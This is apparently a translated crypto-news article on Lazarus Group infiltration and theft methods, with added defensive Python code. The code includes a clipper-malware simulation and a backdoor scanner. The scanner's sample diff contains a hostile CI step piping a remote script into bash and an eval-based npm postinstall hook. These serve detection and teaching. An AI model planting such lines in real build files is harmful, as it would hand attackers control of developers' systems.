How to identify and counter the "North Korean hacker group" around you?


Original | Odaily Planet Daily (@OdailyChina)

Author | CryptoLeo (@LeoAndCrypto)

The crypto world has long suffered from North Korean hackers!

Recently, the security organization Security Alliance (SEAL) published a post titled "Helping You Identify Real North Korean Developers," accompanied by six photos of suspected North Korean operatives taken from a website it has launched, and disclosed the source of the images: lazarus.group

Everyone should be familiar with the Lazarus Group, the notorious North Korean hacking organization. The post quickly sparked heated discussion on social media, because North Korean hackers are posing as developers, engineers and other remote workers to infiltrate projects and companies, then launch attacks that drain their funds, killing projects before they mature.

Track Record - North Korea's Biggest Puppet Master Lazarus Group

As North Korea's largest hacking organization, Lazarus has been linked to nearly every major theft of recent years, taking vast amounts of crypto assets from exchanges, bridges and companies using a wide range of techniques. By one count they even rank third among government-linked Bitcoin holders, ahead of Bhutan and El Salvador and behind only the United States and the United Kingdom.

Related Reference: "Lazarus Group Ranks in the Top Three for Bitcoin Holdings, Is North Korea Also Engaging in Crypto Strategic Reserves?"

In fact, Lazarus Group's theft activities are far from limited to the crypto industry; their "business" is extensive, including stealing bank funds, sensitive data, trade secrets and military intelligence, and extorting ransoms. Some have suggested that Lazarus Group's operations are not always purely for money: they also steal technology and data to support North Korea's technological development, and create chaos in support of geopolitical goals.

For the crypto world, Lazarus Group's operational track record over the past four years is as follows:

2022: Axie Infinity Stolen Over $600 Million in Crypto Assets

The attacker contacted an engineer at Sky Mavis, the developer of Axie Infinity, through LinkedIn and WhatsApp with a purported job opportunity. After several rounds of interviews, the engineer received an extremely generous offer delivered as a PDF file; opening it ran the embedded Trojan, which gave the attacker a foothold in Sky Mavis's systems. From there the attacker obtained the signing keys of five of the nine Ronin bridge validators (the four run by Sky Mavis plus the Axie DAO validator, reachable through an allowlist that had not been revoked), enough to forge withdrawals and drain the bridge.

2023: Poloniex and HTX Stolen Over $200 Million

The Poloniex and HTX thefts (November 2023) were attributed to private key compromise. The attacker had infiltrated and monitored Poloniex for an extended period using advanced persistent threat (APT) tradecraft before eventually gaining access to the hot wallet. APT operations are characterized by stealth, clear targeting, persistence and advanced methods.

Both platforms are associated with Sun Yuchen (Justin Sun), which suggests he was the target at the time.

2024: DMM Bitcoin ($300 Million) and WazirX ($230 Million), Over $500 Million Combined

In May 2024, the Japanese crypto exchange DMM Bitcoin detected an unauthorized outflow of 4,502.9 BTC from its wallet. The Japanese Financial Services Agency required DMM to investigate the cause and to provide a customer compensation plan. In December 2024, the FBI, Japan's National Police Agency and the U.S. Department of Defense Cyber Crime Center attributed the theft to TraderTraitor (a Lazarus-linked cluster): posing as a recruiter on LinkedIn, the attacker sent an employee of Ginco Inc., the wallet software provider DMM used, a malicious script disguised as a pre-employment test. With that foothold the attackers impersonated the employee and manipulated a legitimate transaction request so that the funds went to their own wallet. DMM promised to compensate customers but, under the resulting financial pressure, announced in December 2024 that it would wind down, with customer accounts and assets migrating to SBI VC Trade on March 8, 2025.

In July 2024, the Indian trading platform WazirX was hacked, with losses of approximately $230 million. The investigation report found that one of WazirX's multi-signature wallets had been attacked: the attacker exploited a discrepancy between what the Liminal custody interface displayed and the actual transaction data to get three WazirX signers and one Liminal signer to approve what looked like a routine transaction (such as an ordinary USDT transfer). In reality the transaction carried a malicious payload that upgraded the wallet contract's logic to attacker-controlled code. After that change the attacker had complete control and could move all the funds without ever holding WazirX's keys.

2025: Bybit Stolen $1.5 Billion

In February 2025, Bybit lost roughly $1.5 billion, the largest crypto theft to date. A Safe{Wallet} developer's machine, which had permission to publish the front end, was compromised, and the attacker uploaded a modified JavaScript file to the AWS S3 bucket from which Safe{Wallet}'s web front end is served. The malicious logic activated only for Bybit's Ethereum Safe address and one other address (presumably a test wallet the attacker used to validate the payload). Every Safe{Wallet} user was served the tampered front end, but only the targeted wallets were affected. During a routine transfer from Bybit's cold wallet to a hot wallet, the signers saw a perfectly normal transaction in the Safe{Wallet} interface while actually approving a different one; once the required three signatures were collected, the transaction replaced the Safe's contract logic and the attacker took control of the multi-signature wallet and drained it.

All of the above are thefts involving or linked to Lazarus Group, with enormous sums and professional tradecraft. Notably, in most of them the victim's own smart contracts were never exploited: the entry point was a person (an engineer lured by a fake job offer) or a supplier (the exchange's wallet vendor, the custody interface, the Safe{Wallet} front end), and the funds were lost only after Lazarus had quietly watched the target for a long time, which is why the group is described as omnipresent.

CZ's Warning: Common Scams by Lazarus Group

After the post was published, CZ quickly retweeted it and listed some common scams used by North Korean hackers:

  1. Pretending to be job seekers, trying to secure positions in companies. This allows hackers to get close to their attack targets, especially favoring positions in development, security, and finance;

  2. Pretending to be employers, trying to interview/hire your employees. During the interview, they may claim there is a problem with Zoom and send the interviewee a "link to update," which contains a virus that will control the employee's device. Alternatively, they may present a programming question to the employee and then send some "sample code";

  3. Disguising as users. Sending you links in customer support requests, which lead to pages that download some kind of virus;

  4. Bribing company employees and outsourcing vendors to obtain data. Months ago, a major outsourcing service company in India was hacked, leading to a data breach of users of a major American exchange (the reference is to Coinbase), resulting in user asset losses exceeding $400 million.

Finally, CZ urged companies to train employees not to download unknown files and to carefully screen applicants.

These attacks are not aimed only at companies; individuals should be just as careful in similar situations, such as links from strangers or requests to share a screen, especially in the crypto industry. Once a device is compromised, one of the most common follow-on attacks is clipper malware, which hijacks the clipboard during transfers: when the user copies a wallet address (BTC, ETH or SOL), the malware silently replaces it with a similar address controlled by the attacker. The substitute typically matches the original at both ends (for example the first 4-6 and the last 4-6 characters are identical), so a quick glance passes and the transfer goes to the hacker's address. A related trick that needs no malware at all, address poisoning, sends dust to the victim from such a lookalike address so that it appears in their transaction history and gets copied from there.
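As an added example (not from the article), the following Python models both sides of the clipper attack just described: the attacker's substitution of an address from a pool of pre-generated lookalikes, and a pre-transfer check that flags a pasted address whose visible ends match a saved contact while its middle differs. All addresses, address-book labels and the attacker pool are constructed for the example.

```python
"""Added example (not from the original article): a pre-transfer check against the
clipper / address-poisoning substitution described above. The attacker side is only a
simulation of how such malware picks a lookalike from a pre-generated pool.

Every address below is constructed for the example; none is a real wallet.
"""
import re
from typing import Dict, List, Optional

# Loose syntactic patterns for the address families the article names.
ADDRESS_PATTERNS = {
    "ETH": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "BTC": re.compile(r"^(bc1[02-9ac-hj-np-z]{11,71}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "SOL": re.compile(r"^[1-9A-HJ-NP-Za-km-z]{32,44}$"),
}


def address_type(addr: str) -> Optional[str]:
    # BTC is tested before SOL because legacy BTC addresses are also base58.
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(addr):
            return kind
    return None


def _body(addr: str, kind: str) -> str:
    """Drop the prefix every address of this kind shares (0x, bc1). Without this the
    'first 4-6 characters' heuristic compares constants and never discriminates."""
    if kind == "ETH":
        return addr[2:].lower()
    if kind == "BTC" and addr.lower().startswith("bc1"):
        return addr[3:].lower()
    return addr


def shares_ends(a: str, b: str, kind: str, n: int = 4) -> bool:
    """True if both addresses agree on their first n and last n discriminating characters."""
    x, y = _body(a, kind), _body(b, kind)
    return x[:n] == y[:n] and x[-n:] == y[-n:]


def check_pasted_address(pasted: str, address_book: Dict[str, str], n: int = 4) -> Dict:
    """Verdict for an address about to be used as a transfer destination:
    exact (a saved entry), lookalike (same ends as a saved entry, different middle),
    unknown (no saved entry shares its ends) or invalid (not a recognised format)."""
    kind = address_type(pasted)
    if kind is None:
        return {"verdict": "invalid", "kind": None, "matches": []}

    def same(x: str, y: str) -> bool:
        # Hex ETH addresses are case-insensitive; base58 and bech32 are not.
        return x.lower() == y.lower() if kind == "ETH" else x == y

    exact = [label for label, saved in address_book.items() if same(saved, pasted)]
    if exact:
        return {"verdict": "exact", "kind": kind, "matches": exact}
    lookalikes = [label for label, saved in address_book.items()
                  if address_type(saved) == kind and shares_ends(saved, pasted, kind, n)]
    return {"verdict": "lookalike" if lookalikes else "unknown", "kind": kind, "matches": lookalikes}


def simulate_clipper(clipboard: str, attacker_pool: List[str], n: int = 4) -> str:
    """Attacker-side model: if the clipboard holds an address, swap in a pool address of
    the same kind that shares its visible ends; otherwise leave the clipboard untouched."""
    kind = address_type(clipboard)
    if kind is None:
        return clipboard
    for candidate in attacker_pool:
        if address_type(candidate) == kind and shares_ends(candidate, clipboard, kind, n):
            return candidate
    return clipboard


# Constructed sample data (assumed address book and attacker pool).
COLD_ETH = "0x9a1B2C3d4E5F60718293A4B5C6D7E8F901234567"
LOOKALIKE_ETH = "0x9a1B" + "deadbeef" * 4 + "4567"          # same first/last 4 of the body
COLD_BTC = "bc1q" + "qpzry9x8gf2tvdw0s3jn54khce6mua7lqpzry9"
LOOKALIKE_BTC = "bc1qqpz" + "5" * 31 + "zry9"              # same first/last 4 after "bc1"
ADDRESS_BOOK = {"cold-eth": COLD_ETH, "cold-btc": COLD_BTC}
ATTACKER_POOL = [LOOKALIKE_ETH, LOOKALIKE_BTC, "0x" + "1" * 40]

if __name__ == "__main__":
    tampered = simulate_clipper(COLD_ETH, ATTACKER_POOL)
    print(tampered, check_pasted_address(tampered, ADDRESS_BOOK))
```

Note that the "first 4-6 characters" heuristic is weak unless the constant prefix is removed: every Ethereum address starts with 0x and every mainnet SegWit address with bc1q, so the check strips those before comparing. Comparing the ends is a screening test, not a verification; the only reliable defence is to confirm the full address out of band (a hardware wallet display, or a saved and whitelisted address) before signing.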

Additionally, links received from strangers on social media should also be approached with caution, as they may contain viruses.

A Blacklist - Data and Countermeasures Related to North Korean Hackers

Currently, the lazarus.group website lists 63 profiles, each with a different background and status. The profiles present themselves as developers, smart contract engineers and software engineers (targeting Web3, blockchain and backend roles), but the details are unlikely to be genuine: they are identities fabricated by Lazarus Group operators or their associates, and many of the people behind them are still employed at companies.

Each entry lists the names used, social accounts (email addresses, Twitter handles, phone numbers and so on), GitHub accounts, employment history, captured images and in some cases crypto wallet addresses, along with a more detailed analysis of the "resume" (signs of LinkedIn forgery, IP anomalies and the like). This data helps HR teams and companies quickly check whether a candidate or employee poses a risk.

The website has also launched a free feature for verifying a candidate's accounts, covering X, GitHub, Telegram, Discord, websites and email addresses.

The SEAL Frameworks document also helps readers understand the related security background. It notes:

North Korean IT workers frequently use false identities to take remote IT work for foreign companies, and they are an important source of income for the regime, especially for its weapons programs. They take on a wide range of jobs, not only in IT, routinely disguising their identities and locations to win freelance contracts, and the income is sent back to North Korea. These workers are based primarily in China and Russia, with some in parts of Asia, Africa and Latin America.

The document adds that North Korea operates a network of "facilitators" who help the workers conceal their identities and obtain remote online work. Facilitators rent out their digital and physical identities for a fee; their customers are mostly North Korean operators.

Since 2010, the number of North Korean IT workers has increased, their geographical distribution has become broader, and their activities have diversified, with the main objectives being:

- To create stable income for the North Korean regime through remote IT work;

- To build a support network for North Korea's IT-related businesses (smuggling and money laundering);

- To acquire technology, infrastructure, and identity information (including personal and company, digital and physical identity information) from Western companies;

- To leak company secrets (intentionally or unintentionally);

- To extort (ransomware and blackmail);

- To evade sanctions (North Korean entities are prohibited from receiving any form of payment from Western countries);

- To conduct hacking attacks (establishing permanent access to infrastructure for foothold or infiltration);

- To deploy malware (infecting high-value targets for future theft).

The estimated number of North Korean operatives active in companies and government agencies ranges from 2,000 to 15,000, though that count includes multiple identities and inactive accounts belonging to the same person. SEAL estimates that roughly 3-5% of all Web3 developers are North Korean, with at least 200-300 North Korea-linked accounts actively applying to Web3 companies at any given time.

SEAL Frameworks also provides some recommendations for when companies discover employees have ties to the Lazarus Group:

- Do not fire them immediately; behave normally towards them while quietly securing the organization, so as not to tip them off.

- Stop all payments at once; where the case is only suspected, delay payments under a pretext such as a finance-department issue.

- Systematically revoke all access to code repositories, cloud infrastructure and internal systems. At the same time, collect all available data (such as KYC documents, cryptocurrency addresses, email addresses and resumes) for reporting.

- Conduct a comprehensive security audit of all code contributions, paying close attention to dependencies, build files (continuous integration/continuous deployment), and potential backdoors.

- After all security risks have been completely eliminated, terminate their contracts for business-related reasons (such as downsizing or changing direction) and report the matter to law enforcement.
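The audit step above (dependencies, build and CI files, possible backdoors) can be partly mechanised. The following Python is an added example, not part of SEAL's framework or of any named tool: it triages a suspect's commits from `git log --name-only` output, flagging those that touch CI, dependency or build files, and scans the added lines of a diff for patterns that typically carry a planted backdoor. The commit hashes, author alias, file paths and diff content are constructed samples.

```python
"""Added example (not from the original article or SEAL's framework): triage helpers for
auditing a suspected insider's contributions, focusing on the areas the list above names:
dependencies, build/CI files and potential backdoors.

Inputs are constructed samples in the shape of
`git log --name-only --pretty=format:%h|%an|%s` and `git show` output; the hashes,
author alias and file contents are invented.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Paths where a single commit can alter what gets built, installed or deployed.
RISKY_PATHS: List[Tuple[str, str]] = [
    (r"^\.github/workflows/", "CI workflow"),
    (r"(^|/)(Jenkinsfile|\.gitlab-ci\.yml|\.circleci/|\.travis\.yml)", "CI config"),
    (r"(^|/)(package\.json|package-lock\.json|yarn\.lock|pnpm-lock\.yaml)$", "npm manifest/lockfile"),
    (r"(^|/)(requirements.*\.txt|pyproject\.toml|setup\.py|setup\.cfg|Pipfile(\.lock)?)$", "Python deps"),
    (r"(^|/)(go\.mod|go\.sum|Cargo\.toml|Cargo\.lock)$", "Go/Rust deps"),
    (r"(^|/)(Dockerfile|docker-compose.*\.ya?ml)$", "container build"),
    (r"(^|/)(Makefile|.*\.sh|hardhat\.config\.(js|ts)|foundry\.toml)$", "build/deploy script"),
    (r"(^|/)\.env", "secrets/env file"),
]

# Constructs that frequently appear in planted backdoors; each hit deserves a manual read.
SUSPICIOUS_ADDED_LINES: List[Tuple[str, str]] = [
    (r"curl[^|\n]*\|\s*(ba)?sh", "remote script piped to shell"),
    (r"base64\s+(-d|--decode)|Buffer\.from\([^)]*['\"]base64['\"]\s*\)", "base64 decode of embedded payload"),
    (r"\beval\s*\(", "eval of dynamic code"),
    (r"\"(pre|post)install\"\s*:", "npm lifecycle hook"),
    (r"child_process|subprocess\.(Popen|run|call)|os\.system", "process spawn"),
    (r"https?://\d{1,3}(\.\d{1,3}){3}", "raw-IP URL"),
]


@dataclass
class Commit:
    sha: str
    author: str
    subject: str
    files: List[str] = field(default_factory=list)


def parse_name_only_log(text: str) -> List[Commit]:
    """Parse blocks of '<sha>|<author>|<subject>' followed by one path per line."""
    commits = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        sha, author, subject = lines[0].split("|", 2)
        commits.append(Commit(sha, author, subject, [l.strip() for l in lines[1:] if l.strip()]))
    return commits


def flag_risky_commits(commits: List[Commit]) -> List[Dict]:
    """Return the commits that touch any risky path, with the matching (path, reason) pairs."""
    flagged = []
    for c in commits:
        hits = [(path, reason) for path in c.files
                for pattern, reason in RISKY_PATHS if re.search(pattern, path)]
        if hits:
            flagged.append({"sha": c.sha, "subject": c.subject, "hits": hits})
    return flagged


def scan_diff(diff_text: str) -> List[Dict]:
    """Scan only added lines of a unified diff; removed and context lines cannot plant code."""
    findings = []
    for n, line in enumerate(diff_text.splitlines(), 1):
        if not line.startswith("+") or line.startswith("+++"):
            continue
        for pattern, reason in SUSPICIOUS_ADDED_LINES:
            if re.search(pattern, line):
                findings.append({"line": n, "reason": reason, "text": line[1:].strip()})
    return findings


# Constructed sample inputs.
SAMPLE_LOG = """a1f3c9e|dev-alias|Fix typo in README
README.md

b7d2e10|dev-alias|Bump build tooling
.github/workflows/release.yml
package.json

c4e8f77|dev-alias|Refactor price oracle tests
test/oracle.test.ts
"""

SAMPLE_DIFF = """diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml
--- a/.github/workflows/release.yml
+++ b/.github/workflows/release.yml
@@ -10,3 +10,4 @@ jobs:
       - uses: actions/checkout@v4
+      - run: curl -sSL http://203.0.113.7/setup.sh | bash
       - run: npm ci
diff --git a/package.json b/package.json
--- a/package.json
+++ b/package.json
@@ -5,5 +5,6 @@
   "scripts": {
     "build": "tsc",
+    "postinstall": "node -e eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())",
     "test": "jest"
   },
"""

if __name__ == "__main__":
    for entry in flag_risky_commits(parse_name_only_log(SAMPLE_LOG)):
        print(entry)
    for finding in scan_diff(SAMPLE_DIFF):
        print(finding)
```

In a real review, generate the inputs with `git log --author=<alias> --name-only --pretty=format:%h|%an|%s` and `git show <sha>`. A hit is a reason to read the change by hand, not a conviction, and the pattern lists should be extended for the repository's own ecosystem (Solidity deployment scripts, Hardhat or Foundry configuration, release workflows).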

Continuously Updated Blacklist - Short-term Effectiveness or Long-term Benefits

Regarding lazarus.group's public listing: most people believe the list can help companies identify risky employees and candidates and so reduce the number of incidents.

Publicly sharing such data may work in the short term, but since the list is public, operators who find themselves on it will likely change their public accounts and personal details. SEAL's reply is that many of them will still habitually reuse familiar accounts and so expose themselves. With AI deepfake tools now available, however, operators may be able to refresh every detail or adopt entirely new identities, so publication may mainly push their disguises to become more careful and harder to detect, especially since so much crypto work is done fully remotely.

Disclaimer: This article represents only the author's personal views and not the position of this platform. It is shared for informational purposes only and does not constitute investment advice to anyone. Any dispute between users and the author is unrelated to this platform. If any article or image on this page infringes rights, please send proof of rights and identity to support@aicoin.com and platform staff will verify it.
